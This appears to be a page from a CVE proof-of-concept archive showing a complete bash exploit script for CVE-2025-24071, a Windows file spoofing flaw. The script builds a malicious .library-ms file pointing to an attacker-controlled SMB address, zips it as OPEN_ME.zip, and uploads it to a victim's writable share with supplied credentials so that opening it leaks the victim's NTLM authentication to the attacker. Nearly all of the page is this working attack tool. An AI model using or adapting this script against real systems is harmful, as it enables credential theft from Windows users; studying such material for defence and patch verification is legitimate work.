4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-24071
README.md
Rendering markdown...
POC / CVE-2025-24071.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash

# CVE-2025-24071 - Windows File Spoofing Vulnerability
# By f4dee
# Requirements zip, smbclient
set -euo pipefail

#Colours
greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"
redColour="\e[0;31m\033[1m"
blueColour="\e[0;34m\033[1m"
yellowColour="\e[0;33m\033[1m"
purpleColour="\e[0;35m\033[1m"
turquoiseColour="\e[0;36m\033[1m"
grayColour="\e[0;37m\033[1m"

if [ ! -x "$(command -v zip)" ] || [ ! -x "$(command -v smbclient)" ]; then
  echo "[!] Missing requirements. Installing zip and smbclient..."
  sudo apt install zip smbclient -y
fi

function ctrl_c(){
  echo -e "\n\n${redColour}[!] Exiting...${endColour}\n"
  tput cnorm; rm -f pwn3d.library-ms OPEN_ME.zip; exit 1
}

#Ctrl+C
trap ctrl_c SIGINT

function helpPanel(){
  echo -e "\n${yellowColour}[+]${endColour}${grayColour} Usage:${endColour}${blueColour} $0${endColour}${greenColour} -i${endColour}${yellowColour} 'YOUR_IP'${endColour}${greenColour} -t${endColour}${yellowColour} 'TARGET_IP'${endColour}${greenColour} -d${endColour}${yellowColour} 'DIRECTORY_WRITE'${endColour} ${greenColour}-u${endColour}${yellowColour} 'USER'${endColour}${greenColour} -p${endColour}${yellowColour} 'PASSWORD'${endColour}\n"
  echo -e "\t${turquoiseColour}-i)${endColour}${grayColour} Your IP address${endColour}"
  echo -e "\t${turquoiseColour}-t)${endColour}${grayColour} Target IP${endColour}"
  echo -e "\t${turquoiseColour}-d)${endColour}${grayColour} A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) ${endColour}"
  echo -e "\t${turquoiseColour}-u)${endColour}${grayColour} Username${endColour}"
  echo -e "\t${turquoiseColour}-p)${endColour}${grayColour} Password${endColour}"
  echo -e "\t${turquoiseColour}-h)${endColour}${grayColour} Display this help panel${endColour}"
}

function exploit(){
  file="pwn3d.library-ms"
  ip="$1"
  target="$2"
  directory="$3"
  user="$4"
  password="$5"

  payload="""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<libraryDescription xmlns=\"http://schemas.microsoft.com/windows/2009/library\">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\$ip\\smbFolder</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

  tput civis
  echo -e "\n${purpleColour}-----Welcome to CVE-2025-24071-----${endColour}\n"
  
  echo -e "${yellowColour}[*]${endColour}${grayColour} Verifying connectivity with target host${endColour} ${yellowColour}$target...${endColour}\n"

  if ping -c 1 $target &>/dev/null; then
    sleep 1
    echo -e "${greenColour}[+] Host $target responded successfully to ping.${endColour}\n"
    echo "$payload" > "$file"
    sleep 1
    echo -e "${yellowColour}[>]${endColour}${grayColour} Library file $file created...${endColour}\n"
    sleep 1
    echo -e "${yellowColour}[>]${endColour}${grayColour} File created successfully $file...${endColour}\n"
    sleep 1
    
    if [ -f "$file" ]; then
      zip -q OPEN_ME.zip "$file"
      echo -e "${yellowColour}[>]${endColour}${grayColour} Creating ZIP file...${endColour}\n"
      sleep 1

      echo -e "${yellowColour}[>]${endColour}${grayColour} Uploading malicious.zip...${endColour}\n"
      smbclient \\\\$target\\$directory -U "$user%$password" -c "put OPEN_ME.zip" &>/dev/null
    
      echo -e "${redColour}[!] Remove zip and pwn3d.library-ms...${endColour}\n"
      rm -f OPEN_ME.zip "$file"
      sleep 1
      
      echo -e "${yellowColour}[~]${endColour}${grayColour} Payload sent successfully. Waiting :D ...${endColour}"
    else
      echo -e "${redColour}[!] File $file does not existing...${endColour}"
      exit 1
    fi
    tput cnorm
  else
    echo -e "${redColour}[!] Host $target did not respond to ping; it may be down or unreachable.${endColour}"
    tput cnorm; exit 1
  fi
  tput cnorm
}

declare -i parameter_counter=0

while getopts "i:t:d:u:p:h" arg; do
  case "${arg}" in
    i) ip="${OPTARG}"; let parameter_counter+=1;;
    t) target="${OPTARG}"; let parameter_counter+=1;;
    d) directory="${OPTARG}"; let parameter_counter+=1;;
    u) user="${OPTARG}"; let parameter_counter+=1;;
    p) password="${OPTARG}"; let parameter_counter+=1;;
    h) helpPanel; exit 0;;
    *) helpPanel; exit 1;;
  esac
done

shift "$((OPTIND - 1))"
if [ $# -gt 0 ]; then
  helpPanel
fi

if [ $parameter_counter -eq 5 ]; then
  exploit "$ip" "$target" "$directory" "$user" "$password"
else
  helpPanel; exit 1
fi